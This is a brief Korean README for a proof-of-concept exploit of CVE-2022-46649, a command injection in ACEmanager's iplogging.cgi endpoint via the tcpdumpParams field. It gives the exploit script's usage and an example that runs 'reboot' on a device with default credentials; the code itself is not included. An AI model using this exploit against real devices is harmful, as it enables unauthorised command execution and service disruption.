
ACEmanager PoC 익스플로잇
CVE-2022-46649에 대한 PoC 익스플로잇, /cgi-bin/iplogging.cgi 엔드포인트의 명령 주입 취약점.
이 취약점은 인증된 공격자가 조작된 tcpdumpParams를 통해 임의의 OS 명령을 실행할 수 있도록 합니다.
python3 exploit.py <host> <port> <username> <password> <command>
예시
python3 exploit.py 192.168.13.1 9443 admin admin "reboot"